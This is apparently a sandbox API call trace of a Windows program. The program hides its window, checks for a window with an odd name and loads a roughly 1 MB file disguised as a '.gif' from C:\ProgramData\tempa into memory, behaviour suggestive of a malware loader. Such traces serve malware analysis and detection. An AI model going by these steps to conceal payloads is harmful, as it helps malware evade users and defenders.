[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d6e20c9
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d6e1fdb
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d6e1e8d
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d6e1f0f
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d6e1ccd
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d6e216d
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d6e22be
[0209.367] GetProcAddress (hModule=0x6d6b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d6e21e2
[0209.367] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0209.368] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0209.368] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0209.368] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0209.368] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0209.368] GetCurrentThreadId () returned 0x994
[0209.368] GlobalAddAtomA (lpString="WndProcPtr0040000000000994") returned 0xc0e5
[0209.368] VirtualAlloc (lpAddress=0x654000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x654000
[0209.368] ShowWindow (hWnd=0x1601e8, nCmdShow=0) returned 0
[0209.369] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0209.369] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0209.369] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af738*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1af738*=0) returned 0x0
[0209.369] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af730*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1af730*=0) returned 0x0
[0209.369] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af730*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1af730*=0) returned 0x10be00
[0209.369] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x1af730*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1af730*=0) returned 0x0
[0209.370] GlobalLock (hMem=0x360004) returned 0x890020
[0209.370] ReadFile (in: hFile=0x98, lpBuffer=0x890020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x1af74c, lpOverlapped=0x0 | out: lpBuffer=0x890020*, lpNumberOfBytesRead=0x1af74c*=0x10be00, lpOverlapped=0x0) returned 1
[0209.409] CloseHandle (hObject=0x98) returned 1
[0209.409] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.410] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.410] GlobalUnlock (hMem=0x36000c) returned 0
[0209.410] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4000, uFlags=0x2) returned 0x36000c
[0209.410] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.411] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.411] GlobalUnlock (hMem=0x36000c) returned 0
[0209.411] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6000, uFlags=0x2) returned 0x36000c
[0209.411] GlobalLock (hMem=0x36000c) returned 0x27a820
[0209.412] GlobalHandle (pMem=0x27a820) returned 0x36000c
[0209.412] GlobalUnlock (hMem=0x36000c) returned 0
[0209.412] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8000, uFlags=0x2) returned 0x36000c
[0209.413] GlobalLock (hMem=0x36000c) returned 0x280830
[0209.414] GlobalHandle (pMem=0x280830) returned 0x36000c
[0209.414] GlobalUnlock (hMem=0x36000c) returned 0
[0209.414] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa000, uFlags=0x2) returned 0x36000c
[0209.414] GlobalLock (hMem=0x36000c) returned 0x280830
[0209.414] GlobalHandle (pMem=0x280830) returned 0x36000c
[0209.414] GlobalUnlock (hMem=0x36000c) returned 0
[0209.414] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc000, uFlags=0x2) returned 0x36000c
[0209.415] GlobalLock (hMem=0x36000c) returned 0x28a840
[0209.416] GlobalHandle (pMem=0x28a840) returned 0x36000c
[0209.416] GlobalUnlock (hMem=0x36000c) returned 0
[0209.416] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe000, uFlags=0x2) returned 0x36000c
[0209.416] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.416] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.416] GlobalUnlock (hMem=0x36000c) returned 0
[0209.416] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10000, uFlags=0x2) returned 0x36000c
[0209.416] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.417] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.417] GlobalUnlock (hMem=0x36000c) returned 0
[0209.417] GlobalReAlloc (hMem=0x36000c, dwBytes=0x12000, uFlags=0x2) returned 0x36000c
[0209.417] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.417] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.417] GlobalUnlock (hMem=0x36000c) returned 0
[0209.417] GlobalReAlloc (hMem=0x36000c, dwBytes=0x14000, uFlags=0x2) returned 0x36000c
[0209.418] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.418] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.418] GlobalUnlock (hMem=0x36000c) returned 0
[0209.418] GlobalReAlloc (hMem=0x36000c, dwBytes=0x16000, uFlags=0x2) returned 0x36000c
[0209.418] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.419] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.419] GlobalUnlock (hMem=0x36000c) returned 0
[0209.419] GlobalReAlloc (hMem=0x36000c, dwBytes=0x18000, uFlags=0x2) returned 0x36000c
[0209.419] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.419] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.419] GlobalUnlock (hMem=0x36000c) returned 0
[0209.419] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1a000, uFlags=0x2) returned 0x36000c
[0209.419] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.420] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.420] GlobalUnlock (hMem=0x36000c) returned 0
[0209.420] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1c000, uFlags=0x2) returned 0x36000c
[0209.420] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.420] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.420] GlobalUnlock (hMem=0x36000c) returned 0
[0209.421] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1e000, uFlags=0x2) returned 0x36000c
[0209.421] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.421] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.421] GlobalUnlock (hMem=0x36000c) returned 0
[0209.421] GlobalReAlloc (hMem=0x36000c, dwBytes=0x20000, uFlags=0x2) returned 0x36000c
[0209.421] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.422] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.422] GlobalUnlock (hMem=0x36000c) returned 0
[0209.422] GlobalReAlloc (hMem=0x36000c, dwBytes=0x22000, uFlags=0x2) returned 0x36000c
[0209.424] GlobalLock (hMem=0x36000c) returned 0x296820
[0209.424] GlobalHandle (pMem=0x296820) returned 0x36000c
[0209.424] GlobalUnlock (hMem=0x36000c) returned 0
[0209.424] GlobalReAlloc (hMem=0x36000c, dwBytes=0x24000, uFlags=0x2) returned 0x36000c
[0209.424] GlobalLock (hMem=0x36000c) returned 0x296820
[0209.425] GlobalHandle (pMem=0x296820) returned 0x36000c
[0209.425] GlobalUnlock (hMem=0x36000c) returned 0
[0209.425] GlobalReAlloc (hMem=0x36000c, dwBytes=0x26000, uFlags=0x2) returned 0x36000c
[0209.427] GlobalLock (hMem=0x36000c) returned 0x2ba830
[0209.427] GlobalHandle (pMem=0x2ba830) returned 0x36000c
[0209.427] GlobalUnlock (hMem=0x36000c) returned 0
[0209.427] GlobalReAlloc (hMem=0x36000c, dwBytes=0x28000, uFlags=0x2) returned 0x36000c
[0209.427] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.428] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.428] GlobalUnlock (hMem=0x36000c) returned 0
[0209.428] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2a000, uFlags=0x2) returned 0x36000c
[0209.428] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.428] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.429] GlobalUnlock (hMem=0x36000c) returned 0
[0209.429] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2c000, uFlags=0x2) returned 0x36000c
[0209.429] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.429] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.429] GlobalUnlock (hMem=0x36000c) returned 0
[0209.429] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2e000, uFlags=0x2) returned 0x36000c
[0209.429] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.430] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.430] GlobalUnlock (hMem=0x36000c) returned 0
[0209.430] GlobalReAlloc (hMem=0x36000c, dwBytes=0x30000, uFlags=0x2) returned 0x36000c
[0209.430] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.430] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.430] GlobalUnlock (hMem=0x36000c) returned 0
[0209.430] GlobalReAlloc (hMem=0x36000c, dwBytes=0x32000, uFlags=0x2) returned 0x36000c
[0209.430] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.431] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.431] GlobalUnlock (hMem=0x36000c) returned 0
[0209.431] GlobalReAlloc (hMem=0x36000c, dwBytes=0x34000, uFlags=0x2) returned 0x36000c
[0209.431] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.431] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.432] GlobalUnlock (hMem=0x36000c) returned 0
[0209.432] GlobalReAlloc (hMem=0x36000c, dwBytes=0x36000, uFlags=0x2) returned 0x36000c
[0209.432] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.432] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.432] GlobalUnlock (hMem=0x36000c) returned 0
[0209.432] GlobalReAlloc (hMem=0x36000c, dwBytes=0x38000, uFlags=0x2) returned 0x36000c
[0209.432] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.433] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.433] GlobalUnlock (hMem=0x36000c) returned 0
[0209.433] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3a000, uFlags=0x2) returned 0x36000c
[0209.433] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.433] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.433] GlobalUnlock (hMem=0x36000c) returned 0
[0209.433] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3c000, uFlags=0x2) returned 0x36000c
[0209.433] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.434] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.434] GlobalUnlock (hMem=0x36000c) returned 0
[0209.434] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3e000, uFlags=0x2) returned 0x36000c
[0209.434] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.434] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.435] GlobalUnlock (hMem=0x36000c) returned 0
[0209.435] GlobalReAlloc (hMem=0x36000c, dwBytes=0x40000, uFlags=0x2) returned 0x36000c
[0209.435] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.435] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.435] GlobalUnlock (hMem=0x36000c) returned 0
[0209.435] GlobalReAlloc (hMem=0x36000c, dwBytes=0x42000, uFlags=0x2) returned 0x36000c
[0209.435] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.436] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.436] GlobalUnlock (hMem=0x36000c) returned 0
[0209.436] GlobalReAlloc (hMem=0x36000c, dwBytes=0x44000, uFlags=0x2) returned 0x36000c
[0209.436] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.436] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.436] GlobalUnlock (hMem=0x36000c) returned 0
[0209.436] GlobalReAlloc (hMem=0x36000c, dwBytes=0x46000, uFlags=0x2) returned 0x36000c
[0209.436] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.437] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.437] GlobalUnlock (hMem=0x36000c) returned 0
[0209.437] GlobalReAlloc (hMem=0x36000c, dwBytes=0x48000, uFlags=0x2) returned 0x36000c
[0209.437] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.437] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.438] GlobalUnlock (hMem=0x36000c) returned 0
[0209.438] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4a000, uFlags=0x2) returned 0x36000c
[0209.438] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.438] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.438] GlobalUnlock (hMem=0x36000c) returned 0
[0209.438] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4c000, uFlags=0x2) returned 0x36000c
[0209.438] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.439] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.439] GlobalUnlock (hMem=0x36000c) returned 0
[0209.439] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4e000, uFlags=0x2) returned 0x36000c
[0209.439] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.440] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.440] GlobalUnlock (hMem=0x36000c) returned 0
[0209.440] GlobalReAlloc (hMem=0x36000c, dwBytes=0x50000, uFlags=0x2) returned 0x36000c
[0209.440] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.441] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.441] GlobalUnlock (hMem=0x36000c) returned 0
[0209.441] GlobalReAlloc (hMem=0x36000c, dwBytes=0x52000, uFlags=0x2) returned 0x36000c
[0209.441] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.441] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.441] GlobalUnlock (hMem=0x36000c) returned 0
[0209.441] GlobalReAlloc (hMem=0x36000c, dwBytes=0x54000, uFlags=0x2) returned 0x36000c
[0209.441] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.442] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.442] GlobalUnlock (hMem=0x36000c) returned 0
[0209.442] GlobalReAlloc (hMem=0x36000c, dwBytes=0x56000, uFlags=0x2) returned 0x36000c
[0209.442] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.442] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.442] GlobalUnlock (hMem=0x36000c) returned 0
[0209.442] GlobalReAlloc (hMem=0x36000c, dwBytes=0x58000, uFlags=0x2) returned 0x36000c
[0209.442] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.443] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.443] GlobalUnlock (hMem=0x36000c) returned 0
[0209.443] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5a000, uFlags=0x2) returned 0x36000c
[0209.443] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.444] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.444] GlobalUnlock (hMem=0x36000c) returned 0
[0209.444] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5c000, uFlags=0x2) returned 0x36000c
[0209.444] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.444] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.444] GlobalUnlock (hMem=0x36000c) returned 0
[0209.444] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5e000, uFlags=0x2) returned 0x36000c
[0209.444] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.445] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.445] GlobalUnlock (hMem=0x36000c) returned 0
[0209.445] GlobalReAlloc (hMem=0x36000c, dwBytes=0x60000, uFlags=0x2) returned 0x36000c
[0209.445] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.445] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.445] GlobalUnlock (hMem=0x36000c) returned 0
[0209.445] GlobalReAlloc (hMem=0x36000c, dwBytes=0x62000, uFlags=0x2) returned 0x36000c
[0209.445] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.446] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.446] GlobalUnlock (hMem=0x36000c) returned 0
[0209.446] GlobalReAlloc (hMem=0x36000c, dwBytes=0x64000, uFlags=0x2) returned 0x36000c
[0209.446] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.447] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.447] GlobalUnlock (hMem=0x36000c) returned 0
[0209.447] GlobalReAlloc (hMem=0x36000c, dwBytes=0x66000, uFlags=0x2) returned 0x36000c
[0209.447] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.447] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.447] GlobalUnlock (hMem=0x36000c) returned 0
[0209.447] GlobalReAlloc (hMem=0x36000c, dwBytes=0x68000, uFlags=0x2) returned 0x36000c
[0209.447] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.448] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.448] GlobalUnlock (hMem=0x36000c) returned 0
[0209.448] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6a000, uFlags=0x2) returned 0x36000c
[0209.448] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.448] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.448] GlobalUnlock (hMem=0x36000c) returned 0
[0209.448] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6c000, uFlags=0x2) returned 0x36000c
[0209.453] GlobalLock (hMem=0x36000c) returned 0x2e0820
[0209.454] GlobalHandle (pMem=0x2e0820) returned 0x36000c
[0209.454] GlobalUnlock (hMem=0x36000c) returned 0
[0209.454] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6e000, uFlags=0x2) returned 0x36000c
[0209.454] GlobalLock (hMem=0x36000c) returned 0x2e0820
[0209.454] GlobalHandle (pMem=0x2e0820) returned 0x36000c
[0209.454] GlobalUnlock (hMem=0x36000c) returned 0
[0209.454] GlobalReAlloc (hMem=0x36000c, dwBytes=0x70000, uFlags=0x2) returned 0x36000c
[0209.468] GlobalLock (hMem=0x36000c) returned 0x2400048
[0209.469] GlobalHandle (pMem=0x2400048) returned 0x36000c
[0209.469] GlobalUnlock (hMem=0x36000c) returned 0
[0209.469] GlobalReAlloc (hMem=0x36000c, dwBytes=0x72000, uFlags=0x2) returned 0x36000c
[0209.474] GlobalLock (hMem=0x36000c) returned 0x2470058
[0209.475] GlobalHandle (pMem=0x2470058) returned 0x36000c
[0209.475] GlobalUnlock (hMem=0x36000c) returned 0
[0209.475] GlobalReAlloc (hMem=0x36000c, dwBytes=0x74000, uFlags=0x2) returned 0x36000c
[0209.475] GlobalLock (hMem=0x36000c) returned 0x2470058
[0209.476] GlobalHandle (pMem=0x2470058) returned 0x36000c
[0209.476] GlobalUnlock (hMem=0x36000c) returned 0
[0209.476] GlobalReAlloc (hMem=0x36000c, dwBytes=0x76000, uFlags=0x2) returned 0x36000c
[0209.490] GlobalLock (hMem=0x36000c) returned 0x276810
[0209.491] GlobalHandle (pMem=0x276810) returned 0x36000c
[0209.491] GlobalUnlock (hMem=0x36000c) returned 0
[0209.491] GlobalReAlloc (hMem=0x36000c, dwBytes=0x78000, uFlags=0x2) returned 0x36000c
[0209.496] GlobalLock (hMem=0x36000c) returned 0x2400048
[0209.497] GlobalHandle (pMem=0x2400048) returned 0x36000c
[0209.497] GlobalUnlock (hMem=0x36000c) returned 0
[0209.497] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7a000, uFlags=0x2) returned 0x36000c
[0209.501] GlobalLock (hMem=0x36000c) returned 0x2478058
[0209.502] GlobalHandle (pMem=0x2478058) returned 0x36000c
[0209.502] GlobalUnlock (hMem=0x36000c) returned 0
[0209.502] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7c000, uFlags=0x2) returned 0x36000c
[0209.502] GlobalLock (hMem=0x36000c) returned 0x2478058
[0209.503] GlobalHandle (pMem=0x2478058) returned 0x36000c
[0209.503] GlobalUnlock (hMem=0x36000c) returned 0
[0209.503] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7e000, uFlags=0x2) returned 0x36000c
[0209.515] GlobalLock (hMem=0x36000c) returned 0x2500048
[0209.516] GlobalHandle (pMem=0x2500048) returned 0x36000c
[0209.516] GlobalUnlock (hMem=0x36000c) returned 0
[0209.516] GlobalReAlloc (hMem=0x36000c, dwBytes=0x80000, uFlags=0x2) returned 0x36000c
[0209.531] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.531] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.531] GlobalUnlock (hMem=0x36000c) returned 0
[0209.532] GlobalReAlloc (hMem=0x36000c, dwBytes=0x82000, uFlags=0x2) returned 0x36000c
[0209.540] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.541] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.541] GlobalUnlock (hMem=0x36000c) returned 0
[0209.541] GlobalReAlloc (hMem=0x36000c, dwBytes=0x84000, uFlags=0x2) returned 0x36000c
[0209.551] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.552] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.552] GlobalUnlock (hMem=0x36000c) returned 0
[0209.552] GlobalReAlloc (hMem=0x36000c, dwBytes=0x86000, uFlags=0x2) returned 0x36000c
[0209.561] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.562] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.562] GlobalUnlock (hMem=0x36000c) returned 0
[0209.562] GlobalReAlloc (hMem=0x36000c, dwBytes=0x88000, uFlags=0x2) returned 0x36000c
[0209.571] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.572] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.572] GlobalUnlock (hMem=0x36000c) returned 0
[0209.572] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8a000, uFlags=0x2) returned 0x36000c
[0209.583] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.583] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.583] GlobalUnlock (hMem=0x36000c) returned 0
[0209.583] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8c000, uFlags=0x2) returned 0x36000c
[0209.593] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.594] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.594] GlobalUnlock (hMem=0x36000c) returned 0
[0209.594] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8e000, uFlags=0x2) returned 0x36000c
[0209.603] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.604] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.604] GlobalUnlock (hMem=0x36000c) returned 0
[0209.604] GlobalReAlloc (hMem=0x36000c, dwBytes=0x90000, uFlags=0x2) returned 0x36000c
[0209.614] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.615] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.615] GlobalUnlock (hMem=0x36000c) returned 0
[0209.615] GlobalReAlloc (hMem=0x36000c, dwBytes=0x92000, uFlags=0x2) returned 0x36000c
[0209.625] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.625] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.625] GlobalUnlock (hMem=0x36000c) returned 0
[0209.625] GlobalReAlloc (hMem=0x36000c, dwBytes=0x94000, uFlags=0x2) returned 0x36000c
[0209.635] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.636] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.636] GlobalUnlock (hMem=0x36000c) returned 0
[0209.636] GlobalReAlloc (hMem=0x36000c, dwBytes=0x96000, uFlags=0x2) returned 0x36000c
[0209.646] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.647] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.647] GlobalUnlock (hMem=0x36000c) returned 0
[0209.647] GlobalReAlloc (hMem=0x36000c, dwBytes=0x98000, uFlags=0x2) returned 0x36000c
[0209.657] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.658] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.658] GlobalUnlock (hMem=0x36000c) returned 0
[0209.658] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9a000, uFlags=0x2) returned 0x36000c
[0209.668] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.669] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.669] GlobalUnlock (hMem=0x36000c) returned 0
[0209.669] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9c000, uFlags=0x2) returned 0x36000c
[0209.680] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.681] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.681] GlobalUnlock (hMem=0x36000c) returned 0
[0209.681] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9e000, uFlags=0x2) returned 0x36000c
[0209.694] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.695] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.695] GlobalUnlock (hMem=0x36000c) returned 0
[0209.695] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa0000, uFlags=0x2) returned 0x36000c
[0209.708] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.709] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.709] GlobalUnlock (hMem=0x36000c) returned 0
[0209.709] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa2000, uFlags=0x2) returned 0x36000c
[0209.722] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.723] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.723] GlobalUnlock (hMem=0x36000c) returned 0
[0209.723] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa4000, uFlags=0x2) returned 0x36000c
[0209.737] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.738] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.738] GlobalUnlock (hMem=0x36000c) returned 0
[0209.738] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa6000, uFlags=0x2) returned 0x36000c
[0209.752] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.753] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.753] GlobalUnlock (hMem=0x36000c) returned 0
[0209.753] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa8000, uFlags=0x2) returned 0x36000c
[0209.767] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.768] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.768] GlobalUnlock (hMem=0x36000c) returned 0
[0209.768] GlobalReAlloc (hMem=0x36000c, dwBytes=0xaa000, uFlags=0x2) returned 0x36000c
[0209.781] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.782] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.782] GlobalUnlock (hMem=0x36000c) returned 0
[0209.782] GlobalReAlloc (hMem=0x36000c, dwBytes=0xac000, uFlags=0x2) returned 0x36000c
[0209.796] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.797] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.797] GlobalUnlock (hMem=0x36000c) returned 0
[0209.797] GlobalReAlloc (hMem=0x36000c, dwBytes=0xae000, uFlags=0x2) returned 0x36000c
[0209.812] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.813] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.813] GlobalUnlock (hMem=0x36000c) returned 0
[0209.813] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb0000, uFlags=0x2) returned 0x36000c
[0209.828] GlobalLock (hMem=0x36000c) returned 0xde0020
[0209.829] GlobalHandle (pMem=0xde0020) returned 0x36000c
[0209.829] GlobalUnlock (hMem=0x36000c) returned 0
[0209.829] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb2000, uFlags=0x2) returned 0x36000c
[0209.843] GlobalLock (hMem=0x36000c) returned 0x2700020
[0209.844] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0209.844] GlobalUnlock (hMem=0x36000c) returned 0
